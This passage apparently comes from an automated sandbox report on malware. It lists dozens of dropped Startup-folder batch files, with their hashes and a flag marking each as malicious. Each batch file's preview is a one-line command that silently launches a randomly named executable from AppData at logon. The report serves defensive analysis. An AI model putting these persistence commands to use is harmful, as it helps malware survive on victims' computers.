                                                                                                                                                                                                                                Entropy (8bit):4.956797786124995
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5uX3XpgJjAd/kdan:fE1wkn23unX2OpD
                                                                                                                                                                                                                                MD5:33F8EBF5DDD730FC6F5B97D224665EDF
                                                                                                                                                                                                                                SHA1:F3E0F763D1486B72752494A17875D7A73A4B0E54
                                                                                                                                                                                                                                SHA-256:7AAFBB217C4D72C0F09A4A2CC74AA4BC20AB19DA11EEF780EC8B06C0A0871A82
                                                                                                                                                                                                                                SHA-512:5F98FD2A333BFC9BCDBD6CEB39860D30622FEE6503634B08C5036A11545D3487F98E34754C61470549AF73DF7193FE447BAAE9241431C17C5E43302906720A3E
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\K8iQZVR1QcKL7tq874t7OVK9.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\SbQ0yDAjokdr2V5NsofhcXiW.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.933255124462214
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5gtcqtNW7CsSq0sn:fE1wkn23gt9tEUqL
                                                                                                                                                                                                                                MD5:B7ADE79097379F6E02F442938A1AE5D7
                                                                                                                                                                                                                                SHA1:BE08C8B3370A6FAF84D071731B4A656A7BD7F21F
                                                                                                                                                                                                                                SHA-256:3B46B8E18AFE082CABE833BA59CFFAB884EC461A7F3E2B8164B4247FD8E921B2
                                                                                                                                                                                                                                SHA-512:47C0AC8D1DD86B611F30E64FBD51D44BC87FB78058ABAA4DDD4B8091808306882190B6D5705BF5B6EDE6C0E0532A45098B72D37A5BF1BB7A7430881AD97D8FCD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\E4yp79Qa2EvDhsHlzSxMTwUz.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\THlJn0bCoJMkwaJJ1damaKHf.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.916657341451682
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5ddIOh2cz298xiF:fE1wkn23fIOhY98xiF
                                                                                                                                                                                                                                MD5:9112DBC5BA6248E997A63FF39F75FFEE
                                                                                                                                                                                                                                SHA1:02E39717E21834D088F5928EDFF2634760152D86
                                                                                                                                                                                                                                SHA-256:92B9B57311382A18CE3EEECE150C76A39C8B71D99397FE60CA9B8FF2AAE9FEBE
                                                                                                                                                                                                                                SHA-512:6D325FA555C4EA338B7585C14E84B3C9FB79212BB29B55C4C79DD4605C5769688ECFD4201CE6CC4BA71AEE2FD55AACF3B46B20286A6DC91A263E216A406D3FB8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\x8JusOpOPD2Ef7JVSoCYQS8k.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TSUKSzjiont3ubOypqhhZvXM.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):5.001242230569439
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5UTxrLJSkdan:fE1wkn23UTFJSD
                                                                                                                                                                                                                                MD5:911A1FE42A52E8DA0F2D4ADC1D8A4227
                                                                                                                                                                                                                                SHA1:31E41E38D7AA01FF564539F863C9439B86F3AD6B
                                                                                                                                                                                                                                SHA-256:CDABE4753F37EFA37DE9E94B56C27EE068B891AC8D741D0A226E51DEB8AF9EC4
                                                                                                                                                                                                                                SHA-512:4A329A5D7EAF49ED0883E224E36E70B70C7BE7E5E1B4E72DAEF73C32B90FAF81D01A4CFF4D9751AECCF508AFB9928FA292983FEABD8CA6AC6968E9F37DA98EF3
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\13TZhjPb0HxkQlPqajCRkSnB.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\TtQ59dJ4wCe89DD8HhCLHVsL.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.008896877344438
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5XvMdb6vDiiL:fE1wkn23EdbciiL
                                                                                                                                                                                                                                MD5:6F2237053C7347EB2A5F30D40E63AC4E
                                                                                                                                                                                                                                SHA1:30CDF403ECEDDA8D5F609B3F3A9DFF0FEDB62CFB
                                                                                                                                                                                                                                SHA-256:4D815D26469460CAF70A6109E7B8354EFBEC7434EBEAA40B57457AF9EE7235EB
                                                                                                                                                                                                                                SHA-512:B9CDEA29B5D2A1BB3DE4E278D84BFB62144131501BB0490818CF41135C078F3DDD6710740CD2DA5C8AF4F12C64D9AE4DE885AFCC18AF9B285AC0E8E38BC46711
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\2F22VRFSBNYWhRCIxmDEOfGG.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UAr643SNguCt1xm73LKTPAoT.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.887671834205306
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5phkLYhZkCFn:fE1wkn23PkUF
                                                                                                                                                                                                                                MD5:674D2FE7A1739E5F0BC8ACC0F6BF25A5
                                                                                                                                                                                                                                SHA1:0CA3259EF519809ED64B88A6B8A8E5A86C6A7B7D
                                                                                                                                                                                                                                SHA-256:4D583D77B160D42DA02848FEE70AE0FCA34C645B53A63550457F74F99497DF0E
                                                                                                                                                                                                                                SHA-512:69C4F4A36C85BB6CF2695026E05B29C3551EE8849BBA33EEEBE635BCF2DFB98E04DA155559E0B2FAC03AFBAF9D4689A138AB9BC610035341D5CAEFB51CEC80FF
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\LDXcH6E4Iv1SvrK1qy7oaACH.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UQssKesI2uliQ7sIfwOvM5n9.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.921940355605309
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5D2NMWPsqV+XLvn:fE1wkn23iNMIsqIbv
                                                                                                                                                                                                                                MD5:5C839D92C0A67A1A052E9927AECF5062
                                                                                                                                                                                                                                SHA1:97041C96BD42B04F6092C80E1BCD5B3FCCC97F54
                                                                                                                                                                                                                                SHA-256:8F0F9F64F9DB9208563B0E4DB428A0AAD74AB94A10E54FE2ED20517F8575CDC9
                                                                                                                                                                                                                                SHA-512:5F0DBE6BEC4EF667406F9AA9EA561DD172355310BE619118592CA2D6E3632C7B2A7F57BEBE637A029FB2AE77C63050BAE1E92513D060D65B76F69E471A9902A9
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\fnKomgqhEl3jQ0OfLzCfcoX2.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\UxkTO6SD1uCvL9HjSQh27cQ2.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.990851768680142
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J53Hjlj7B4m:fE1wkn23t7B4m
                                                                                                                                                                                                                                MD5:894D7B18B1E1EF3EF54C866F066BE4E8
                                                                                                                                                                                                                                SHA1:940408A8037AD92E39B4CAFF2081C13035A587C7
                                                                                                                                                                                                                                SHA-256:BAA3765D1A1D0A6145E8A05832C6426C42A7395E1750008CA21322C8F2BF71B9
                                                                                                                                                                                                                                SHA-512:0A2382B12D708059AA4E61DF806368F482886980B43BA9D52B655CCDEACE0E4A4FE698E13E8D9CDE1F2761620E81712E9872CE24E8F52199F2B9002094ED0CA8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\RTFxFt6JQGyMVAVqY4EGgVDP.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\VcZwTQ1Borjv2y0HnBVtpR2m.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.929128619506405
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Ug/hSeAoyG4/kdan:fE1wkn23UgpD9QD
                                                                                                                                                                                                                                MD5:259F7F29470081333B6C7716B1B3033D
                                                                                                                                                                                                                                SHA1:AD21E7D34E501262693F0141BE17610839FC7DC7
                                                                                                                                                                                                                                SHA-256:61A64EAB02F9CF69DDF7C0FFA22A77AF5C35CB288C644C01ED40CEBB7CED9F38
                                                                                                                                                                                                                                SHA-512:23DF13763403034588C733C840E19461B8E32E00F0A493372B165412B511DDA7CC67ECB40D44041C797CE506EFBF9455AAED3129716A98AB4B5E2A238011E332
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\qEZDdAWnBbu94XDsWbevAW3Z.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WRjwqgtLRilPROuQsr5g5A6Y.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.898612232787385
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5nCdriwivSVfUsn:fE1wkn23CtMSVss
                                                                                                                                                                                                                                MD5:133D5B8E1127EC52BA7B59DA42951A6D
                                                                                                                                                                                                                                SHA1:B70D3A33C9230A3C442E00913F3AE2D8A5999F90
                                                                                                                                                                                                                                SHA-256:46D05A3BAFBE25C18327FFA6BF39F178D8D721D7EE6110C1D4C57CF9AC23712C
                                                                                                                                                                                                                                SHA-512:4B3FA44FA2BEC8EE620F5414594DD20282190BCE29A79D39F44F6D27753370B20FB447E130476AC54A1CCB76DAB5E9767AA8B59D0B92865DAABF1B9F69913A90
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\BOLsN3rxBHAIGUMuUJ7tVz6n.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\XyNWXmNEbpbFhVSFSSJ7vqq7.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.054480167601347
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rSZ+O/AUn:fE1wkn23ZO/AU
                                                                                                                                                                                                                                MD5:F5FD60665038AE99AD9C7961AD33FE47
                                                                                                                                                                                                                                SHA1:9BE80579EB9CC47234BFB94FE86394BD6F787964
                                                                                                                                                                                                                                SHA-256:D766E518A4E08FAC6883D3218F1763E486B5C4CC023EE7D2DC46DFB3FAA993A2
                                                                                                                                                                                                                                SHA-512:E4FEEBA0B178200648748101AE2D56E10042CB6E0E3D8853006B458A0A13D3DAA7331C2D8DD34B5F2E7B2D347BAC086A57675F62C9A9C333EAB25BB8C6916CCC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\N7Z4zCqKy1jgGt5mkoShe6Ob.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\YM0LEQEFQcy2LayzrWJLzr2X.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):90
                                                                                                                                                                                                                                Entropy (8bit):4.906441464173445
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5RqAzOuFpdiykdan:fE1wkn23BzOuBD
                                                                                                                                                                                                                                MD5:5B7AA6EBC444B8266FB1910334F77E20
                                                                                                                                                                                                                                SHA1:D21AD34490EFED87ECAA355EF195DA14B8766F62
                                                                                                                                                                                                                                SHA-256:37C4B060E502598A152A50F3DB5A72A2EFBBF7B09DD1F8456816AEAFF1A140AA
                                                                                                                                                                                                                                SHA-512:7FE0A5BD6E8873E6D4138FEE41CD8DCEFD4AF12E3F59349F3323B5D9496D806DE3C9F1A2736F4D8DD260DBE687D21C37FEFEB4170380D9FCA28F555819F7D40B
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\tOekaWBMtMvKgKTpn1rNSApR.exe" --silent --allusers=0

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Yo2bOHtMzxxZL1bom4sGHQIE.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.003613863190812
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5iAUcfxidFCHF:fE1wkn23iTcfwdFCl
                                                                                                                                                                                                                                MD5:62DFD3FA9A5377233A45FA415904846F
                                                                                                                                                                                                                                SHA1:7DF9692FCEDAFE4B2BF3FE46B8122F44AF51B562
                                                                                                                                                                                                                                SHA-256:26446423A6336C695D27619D86DD08C2F61A484EF1AEDD5254B49D9370938C4E
                                                                                                                                                                                                                                SHA-512:A7CF0FE52D15FF0B3525D845D7A96372A2EA6DFC5A492D7B986BEEDAFC35F1EAA6982C47B8E34F9661002A34CDDF4C0D00E96D19CBA7329486D558409E2C8182
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\G3AqZmqYns0GbyzqMuR8nWTh.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Z9adfxYPwrNPpZuQpK6e32ji.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.83498383386618
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5rcJ3OO32E/30dmn:fE1wkn232B2rm
                                                                                                                                                                                                                                MD5:FB6CFFA2D87A59A27D4DF4F55ED19F60
                                                                                                                                                                                                                                SHA1:FB6DCD5F808B584F6FB4E95165533443E3BC0964
                                                                                                                                                                                                                                SHA-256:E8FF27275DE00E35F75ABD369343EEAB04865481CA3730C7303B424E0526386F
                                                                                                                                                                                                                                SHA-512:AE4BE93AB5D6A1783C6E772CF14FFEF77F6E1442F3AEB4C5682CA7A88088C866F94D58E5784828492142B192F213B781D4AD0F9485F2C2AE3224571B326CAB34
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\N9lxfrZyrFBnT9kkfNS8cZTT.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ZD6INkMJGFiYItMqV3k0Ldkd.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.893329218633757
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5Tdi/+o+s:fE1wkn23Rlls
                                                                                                                                                                                                                                MD5:1B7D8205A888136B439DE784C71F91E4
                                                                                                                                                                                                                                SHA1:3538E9194F606B120064E7466E39449CB79F8DD9
                                                                                                                                                                                                                                SHA-256:FF9D9082E0CDE2BEB6D27C7EC9BAB0620DA49862CAD999D5A20EAFD1060D8611
                                                                                                                                                                                                                                SHA-512:355F239DE4E3D0EB6C1548C7435B87B8D6D54B4F6D46B029608BD3D4673EAF079F84185DBA019CFE7384609C57A2E311A550C4865583DFE4D7ED9CC68EDA39E8
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\v8Qne8bNiHZnpvaf2IGXNklf.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\a9NSv00SQMrlWyCzm4LVScNC.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):5.048822783172895
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5fQWQnfuJD209/HFn:fE1wkn23LQnfuD9/l
                                                                                                                                                                                                                                MD5:5C1FBB576D76994516E72682F44E1AB3
                                                                                                                                                                                                                                SHA1:58CE7C42AB57BD29F64405E27096D979E8F003C0
                                                                                                                                                                                                                                SHA-256:C493C67867AF4A7C7637D232F48ADB3292E6BAD945731AB979FA3452DA79389C
                                                                                                                                                                                                                                SHA-512:E0B8452FC5B1D8126B21DD2E8AE8AC0DF1A3A53FE6BBD2991CB0FAD633B90AD4D20A7CD4F151A10FA521FD91220773EC0847FEA85294E341AA519ADDFF1192CC
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\zON35BfDXHyPfdPSNEInc2BT.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\asBZ8wuHHDAJRzMiLzRqRpQF.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.990851768680142
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5za0glC0LdJHFn:fE1wkn23O0KRJl
                                                                                                                                                                                                                                MD5:6035C495CC0EE733A7C70DE96DBD01C7
                                                                                                                                                                                                                                SHA1:25E47C2F1EE63178E3C0E972603285581A29063B
                                                                                                                                                                                                                                SHA-256:7CCA2423064B2EF975E78694DBB40009AEACE3373EFF5D38A17A032B6C8DF462
                                                                                                                                                                                                                                SHA-512:EEFAE5F45A257BFB14239B645663900AFB8ACEF3B4ABBA29167B42DFD60F5816327A72DC47A8F7D3F787E308B9773DA35987E15CDCA2151BB8211F01CBB9B866
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\VQkEy4WzpKPECwgnQtVBm3BT.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bdNzZw7sNnZozpGAOggzJM47.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.898612232787384
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J59AqcJh+1I8F:fE1wkn236+CU
                                                                                                                                                                                                                                MD5:8856A9EBE2085337F7C97C3910E61851
                                                                                                                                                                                                                                SHA1:B94AC7329BB11D46D65218DD19D15B637264648E
                                                                                                                                                                                                                                SHA-256:5C70D9B074753A9E16ED99FE052268C55BE81D35DA559BDC818F761D36D675B5
                                                                                                                                                                                                                                SHA-512:2EFF3B1E1B865B64E3568AE5FFCF8AA744DB7A6FD0F636389A085AC1221AADE5BD7F717E125756E921D63CDC79BCABF8152A8A5B1B33418344C84FD8C0A5FA66
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\XexwpboKjyWVbo8FFgPmChDN.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\c0ucrp3AZ3Gqcb9XOi4ScJgO.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.846298602723083
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5k0J56Iln:fE1wkn23ky56Il
                                                                                                                                                                                                                                MD5:E8B79FEF5D68D5F2AB2545BA213116BE
                                                                                                                                                                                                                                SHA1:2C73098520EEDDA7AC545C417AC40FD3FBADC92A
                                                                                                                                                                                                                                SHA-256:86CBB8945998713DDE7E69475E74044013A26B402A787443C12D54A685AAEB77
                                                                                                                                                                                                                                SHA-512:C4186E09B727EAA6DEE6F8B6C9587EC118AEACDEF4716FC20FC13988B02B8145736D4A1AE703E5BCB969BEE87ADC8C4360210387CA4EE03671199685BDEFAA59
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\Ae4UYt4QuRmNhlRoOAHyWthz.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cJFsupPdhex8QpEWXObWONd1.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.92194035560531
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5cMdKAih+ln:fE1wkn23cMIAiy
                                                                                                                                                                                                                                MD5:D039109E52E79DFA0406BE099C481C47
                                                                                                                                                                                                                                SHA1:F93A25393F222A10B2B4A05D447448681EB7652B
                                                                                                                                                                                                                                SHA-256:0D43E6BD9A8E93A4C0291F0603CC91C4FCC32413E485BA9352CF169F55C34D22
                                                                                                                                                                                                                                SHA-512:0A6DD93183D8041AEBBC6BD0BB442A8B3664845FFB2C2A3D88E68E8C76972DD25A7420629B612A1E1616089EEC572BC12741507EE661D1EE79026379FFBBEFDD
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\yjgJ9nt4OTDWzyoY4NSDLOwM.exe"

                                                                                                                                                                                                                                C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\d8IR6x2FHYB42LL3QeY8fNCg.bat

                                                                                                                                                                                                                                Download File
                                                                                                                                                                                                                                Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                Size (bytes):69
                                                                                                                                                                                                                                Entropy (8bit):4.79926798681241
                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                SSDEEP:3:Ljn9m1t+kiE2J5RTA27giW00kqaC4mn:fE1wkn231A2v0kiv
                                                                                                                                                                                                                                MD5:37F97A6117F8CB58EEBC1BD63A84E827
                                                                                                                                                                                                                                SHA1:0319D77F3F4BF6C753880F0F8689FA8A6BDD9142
                                                                                                                                                                                                                                SHA-256:1F9B5D11B81CE3CDB406224C62720CB172183BAAF5E420E3E142CE3E7FC0B140
                                                                                                                                                                                                                                SHA-512:569BC6D1D32460BD385A2C009FC1F844945BDCBE3FD8FB3ECEC99862E74F340C42B81FF138672502C78C3A9E45881FA39CE91B2693E1B49145460DBB71628341
                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                Reputation:unknown
                                                                                                                                                                                                                                Preview:start "" "C:\Users\user\AppData\Local\t6FVjUQyIYOEGsrhSQAlAtYA.exe"

